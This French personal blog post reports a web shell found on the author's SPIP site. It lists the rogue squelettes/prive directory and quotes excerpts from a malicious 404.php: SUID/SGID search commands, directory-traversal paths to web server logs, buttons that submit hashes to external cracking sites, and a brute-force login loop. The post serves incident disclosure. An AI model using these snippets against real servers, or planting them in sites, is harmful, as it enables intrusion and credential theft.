Chez JL

Joliciel Libre

Accueil > Informatique > Internet > Virus sur un site Web

Virus sur un site Web

lundi 13 mai 2019, par JL

Un de mes hébergeurs a détecté un virus sur un de mes sites SPIP.

Voici le contenu d’un répertoire qui ne devrait pas existé, squelettes/prives. Je ne sais pas comment il a été créé. Il n’est pas de base dans SPIP et ce n’est pas moi qui l’ai créé :

ls squelettes/prive
aide_body.css                 ajax_selecteur_fonctions.php  ical_prive.html                javascript  paquet.dtd          rss             spip_style.css        themes            xhtml-special.ent
aide_menu.html                ajax_selecteur.html           images                         login.html  plugin.dtd          rss.html        spip_style_print.css  transmettre       xhtml-symbol.ent
ajax_item_pick_fonctions.php  echafaudage                   informer_auteur_fonctions.php  modeles     puce_prive.gif      spip_admin.css  squelettes            transmettre.html
ajax_item_pick.html           formulaires                   informer_auteur.html           objets      puce_prive_rtl.gif  spip_pass.html  style_prive.css.html  xhtml-lat1.ent

J’ai supprimé le répertoire.

Et le fichier du virus est squelette/prive/transmettre/404.php voici des extraits de son contenu :

...
       "Find" => "",
       "find all suid files" => "find / -type f -perm -04000 -ls",
       "find suid files in current dir" => "find . -type f -perm -04000 -ls",
       "find all sgid files" => "find / -type f -perm -02000 -ls",
...
         $lfiaccess = array(
           1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",
           2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",
           3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",
           4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",
           5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",
...
           input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"
           input type='button' value='milw0rm.com' onclick=\"document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()\"


...
                   if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
                       $success++;
...